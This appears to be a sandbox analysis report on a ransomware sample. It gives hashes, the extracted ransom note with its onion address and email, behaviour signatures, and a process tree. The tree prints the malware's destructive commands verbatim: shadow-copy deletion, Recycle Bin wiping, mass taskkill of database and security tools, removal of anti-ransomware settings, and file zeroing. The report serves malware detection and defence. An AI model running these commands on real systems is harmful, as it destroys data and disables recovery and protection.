Overview

overview

10

Static

static

sample.exe

windows7_x64

10

sample.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-06-2022 17:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sample.exe

  • Size

    94KB

  • MD5

    26f65722f6307386f3aa23237f44c24a

  • SHA1

    d26becc64f43c7af17f2d39d3fc1b744ac3e8fbb

  • SHA256

    cce5a753888cb5b044c767fe8e95e410ebdf1e1c79cabc95db1c9e1a8e81c5e7

  • SHA512

    241c6ba3e95206827fe26ee6ef279e0bad2fbe6d4b55732fdacd078e2a977726a01bc16fd4b213b7483a1f1e74d1355dc416fb04ad8d86e3da2443cfa499bbb1

Score
10/10
ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RECOVERY.txt

Ransom Note
All your important files are encrypted! Any attempts to recover your files using third-party software will have fatal consequences, the files will be changed forever, without the possibility of recovery. There is only one way to get your files back: install the tor browser (https://www.torproject.org/download ) Important: Create a new email in the service http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create for contact! write to me at Retailgaze@onionmail.org Send me your ID by email Key Identifier: PWT7ZX85LDPO0fjsZh2tTV0jF5gmmCBD5RkKG59MkM99OxuUkuD4IgL/Tluu2PPjE7qikYcrxE1jHNhLeCVMfXq0R1esUAoxSaE9vwDiWyYQtbFkdIz4LAUKSIYQxqyvpmjRgyLnJ7gbYrrBna+eHckLw8UhE0gJP58hE6/UdwfFmsPtOr0CNrVpzgIMmZGHssXdUPJF2MbC+5RpxyjYUHOdpwh8ejh6dJoI6zfP4iXudMWxzfBcgg4TRLgGA5BDK8RZtOjsQWcRRLtk0DemhXzS/bIMYQMrkiL4vo18wAXyIYhz7++Y5aRLDqIarNc5RMwG8MoMAFGcBUQEw+uyFXwp0p2Gp2XMLGaa8vYGE6T9kjZRBmfIF9vMceEURqmZOe6s07ygA+BwWp/NWFkii6FgArocce0qk6VfCKgR5QZb/5r07ka2u2wp4ZdmJO9zsWjTS7Lq8kA5Mt0ijM7F9/MbqyhKaj+ZxOsVo6uqNPkqHCY3+ZmLXS9msUhFdTCe2vmD/ZQ3n7WAyr2WP3t4oLRVE4mJTvHIik8N2baRSOFGGlfvwgEWSwqHFRy/Jc5c0LlAa+zdpHBYvpEDF0wahXY60/h1oKmMlb2chRUqlhZ9/Y3TCrzTlEm2IaRf2157TFzfv4PqZ/SEKt7+CasINfNWmKcEOrVXe2JDAp1ou/E=
Emails

Retailgaze@onionmail.org

URLs

http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create

Signatures

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 6 IoCs
  • Drops file in Program Files directory 63 IoCs
  • Drops file in Windows directory 28 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry class 12 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2036
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:652
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1404
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:992
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:1656
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config SQLTELEMETRY start= disabled
          2⤵
          • Launches sc.exe
          PID:1724
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:1968
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:1864
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SSDPSRV start= auto
            2⤵
            • Launches sc.exe
            PID:1500
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:1196
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
            • Launches sc.exe
            PID:1880
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:616
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SstpSvc start= disabled
            2⤵
            • Launches sc.exe
            PID:1448
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:848
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1808
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM synctime.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:928
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1868
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1352
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM Ntrtscan.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqbcoreservice.exe /F
            2⤵
            • Kills process with taskkill
            PID:268
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:816
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM agntsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM isqlplussvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:608
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM firefoxconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:700
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM steam.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1720
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:872
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlwriter.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM onenote.exe /F
            2⤵
            • Kills process with taskkill
            PID:316
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocomm.exe /F
            2⤵
            • Kills process with taskkill
            PID:1864
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM encsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM PccNTMon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:780
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tbirdconfig.exe /F
            2⤵
            • Kills process with taskkill
            PID:1996
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM infopath.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:296
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM excel.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbeng50.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:556
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msaccess.exe /F
            2⤵
            • Kills process with taskkill
            PID:916
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mbamtray.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1392
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM outlook.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat64.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1352
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM CNTAoSMgr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" IM thunderbird.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:268
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tmlisten.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM zoolz.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:792
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM wordpad.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1676
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbsnmp.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1016
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msftesql.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:948
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-opt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM xfssvccon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM powerpnt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocautoupds.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1424
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:968
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocssd.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1864
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM visio.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:316
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM oracle.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:804
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM winword.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:564
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlagent.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1484
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-nt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1196
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlbrowser.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:616
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlservr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:916
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1976
          • C:\Windows\SysWOW64\notepad.exe
            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RECOVERY.txt
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:1516
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
            2⤵
              PID:1592
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.7 -n 3
                3⤵
                • Runs ping.exe
                PID:780
              • C:\Windows\SysWOW64\fsutil.exe
                fsutil file setZeroData offset=0 length=524288 “%s”
                3⤵
                  PID:1880
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
                2⤵
                • Deletes itself
                PID:1764
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 3
                  3⤵
                    PID:1484
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-3439596191425314019-4125160258150192761319059127-809508426-1685777795286717014"
                1⤵
                  PID:268
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-9295736892041876431229420506148101041-1410211457-1314614114727357354515720437"
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1996
                • C:\Windows\system32\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                  1⤵
                  • Modifies registry class
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:608
                  • C:\Windows\system32\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                    2⤵
                    • Opens file in notepad (likely ransom note)
                    PID:1276

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Initial Access

                Execution

                Persistence

                Privilege Escalation

                Defense Evasion

                Modify Registry

                1
                T1112

                Credential Access

                Discovery

                System Information Discovery

                1
                T1082

                Remote System Discovery

                1
                T1018

                Lateral Movement

                Collection

                Exfiltration

                Command and Control

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\Desktop\RECOVERY.txt
                  Filesize

                  1KB

                  MD5

                  457ae8f12b448de3a2c4bb18146ae744

                  SHA1

                  0ba6ffc29c94e4f04f795b2df28bba23ba350cc9

                  SHA256

                  cc1ae0b34340478701b48203c553dac85d83ca4ad8639dba01e64d3d4f1788af

                  SHA512

                  75e3d215aced22fd0249c257f35da84fd4dc2fcce3c69815f55f770486fe1cb6c673e4b08c817e9e78bec2fa0d57ee9cbe8077a01d9e2df660b1899f3134a7a9

                  Download Submit
                • C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                  Filesize

                  410KB

                  MD5

                  7508f2fd88f4196aeeeee65b19805435

                  SHA1

                  213f660409f7ee21dd55ce00414c53bebea633dc

                  SHA256

                  ed40c66f94519096100665682ec7be14108aa1a241c658df5f6736204c79c6f6

                  SHA512

                  a00d5b4390a4f67ed12abace9b7f79bf7e242684ac8c644ec2bf71641100c549811919d504dca416b539127dc9a849d5beeb2a375b52efab0dcb71c621f00c7d

                  Download Submit
                • memory/268-75-0x0000000000000000-mapping.dmp
                  Download
                • memory/268-96-0x0000000000000000-mapping.dmp
                  Download
                • memory/296-88-0x0000000000000000-mapping.dmp
                  Download
                • memory/316-83-0x0000000000000000-mapping.dmp
                  Download
                • memory/316-108-0x0000000000000000-mapping.dmp
                  Download
                • memory/556-90-0x0000000000000000-mapping.dmp
                  Download
                • memory/564-111-0x0000000000000000-mapping.dmp
                  Download
                • memory/608-78-0x0000000000000000-mapping.dmp
                  Download
                • memory/608-126-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/616-114-0x0000000000000000-mapping.dmp
                  Download
                • memory/616-67-0x0000000000000000-mapping.dmp
                  Download
                • memory/652-57-0x0000000000000000-mapping.dmp
                  Download
                • memory/700-79-0x0000000000000000-mapping.dmp
                  Download
                • memory/780-124-0x0000000000000000-mapping.dmp
                  Download
                • memory/780-86-0x0000000000000000-mapping.dmp
                  Download
                • memory/792-98-0x0000000000000000-mapping.dmp
                  Download
                • memory/804-109-0x0000000000000000-mapping.dmp
                  Download
                • memory/816-76-0x0000000000000000-mapping.dmp
                  Download
                • memory/848-69-0x0000000000000000-mapping.dmp
                  Download
                • memory/872-81-0x0000000000000000-mapping.dmp
                  Download
                • memory/916-91-0x0000000000000000-mapping.dmp
                  Download
                • memory/916-115-0x0000000000000000-mapping.dmp
                  Download
                • memory/928-71-0x0000000000000000-mapping.dmp
                  Download
                • memory/948-101-0x0000000000000000-mapping.dmp
                  Download
                • memory/968-106-0x0000000000000000-mapping.dmp
                  Download
                • memory/992-59-0x0000000000000000-mapping.dmp
                  Download
                • memory/1016-100-0x0000000000000000-mapping.dmp
                  Download
                • memory/1196-113-0x0000000000000000-mapping.dmp
                  Download
                • memory/1196-65-0x0000000000000000-mapping.dmp
                  Download
                • memory/1352-94-0x0000000000000000-mapping.dmp
                  Download
                • memory/1352-73-0x0000000000000000-mapping.dmp
                  Download
                • memory/1392-92-0x0000000000000000-mapping.dmp
                  Download
                • memory/1404-58-0x0000000000000000-mapping.dmp
                  Download
                • memory/1416-103-0x0000000000000000-mapping.dmp
                  Download
                • memory/1424-105-0x0000000000000000-mapping.dmp
                  Download
                • memory/1448-68-0x0000000000000000-mapping.dmp
                  Download
                • memory/1484-112-0x0000000000000000-mapping.dmp
                  Download
                • memory/1500-64-0x0000000000000000-mapping.dmp
                  Download
                • memory/1516-121-0x0000000000000000-mapping.dmp
                  Download
                • memory/1592-122-0x0000000000000000-mapping.dmp
                  Download
                • memory/1640-82-0x0000000000000000-mapping.dmp
                  Download
                • memory/1656-60-0x0000000000000000-mapping.dmp
                  Download
                • memory/1664-54-0x0000000000AC0000-0x0000000000ADE000-memory.dmp
                  Filesize

                  120KB

                  Download
                • memory/1664-55-0x00000000754A1000-0x00000000754A3000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1676-99-0x0000000000000000-mapping.dmp
                  Download
                • memory/1680-102-0x0000000000000000-mapping.dmp
                  Download
                • memory/1720-80-0x0000000000000000-mapping.dmp
                  Download
                • memory/1724-61-0x0000000000000000-mapping.dmp
                  Download
                • memory/1764-104-0x0000000000000000-mapping.dmp
                  Download
                • memory/1808-70-0x0000000000000000-mapping.dmp
                  Download
                • memory/1864-63-0x0000000000000000-mapping.dmp
                  Download
                • memory/1864-107-0x0000000000000000-mapping.dmp
                  Download
                • memory/1864-84-0x0000000000000000-mapping.dmp
                  Download
                • memory/1868-72-0x0000000000000000-mapping.dmp
                  Download
                • memory/1872-85-0x0000000000000000-mapping.dmp
                  Download
                • memory/1880-66-0x0000000000000000-mapping.dmp
                  Download
                • memory/1924-77-0x0000000000000000-mapping.dmp
                  Download
                • memory/1928-93-0x0000000000000000-mapping.dmp
                  Download
                • memory/1968-62-0x0000000000000000-mapping.dmp
                  Download
                • memory/1968-95-0x0000000000000000-mapping.dmp
                  Download
                • memory/1976-120-0x0000000070AD0000-0x000000007107B000-memory.dmp
                  Filesize

                  5.7MB

                  Download
                • memory/1976-118-0x0000000070AD0000-0x000000007107B000-memory.dmp
                  Filesize

                  5.7MB

                  Download
                • memory/1976-119-0x0000000070AD0000-0x000000007107B000-memory.dmp
                  Filesize

                  5.7MB

                  Download
                • memory/1976-116-0x0000000000000000-mapping.dmp
                  Download
                • memory/1984-97-0x0000000000000000-mapping.dmp
                  Download
                • memory/1984-74-0x0000000000000000-mapping.dmp
                  Download
                • memory/1996-87-0x0000000000000000-mapping.dmp
                  Download
                • memory/2000-110-0x0000000000000000-mapping.dmp
                  Download
                • memory/2028-89-0x0000000000000000-mapping.dmp
                  Download
                • memory/2036-56-0x0000000000000000-mapping.dmp
                  Download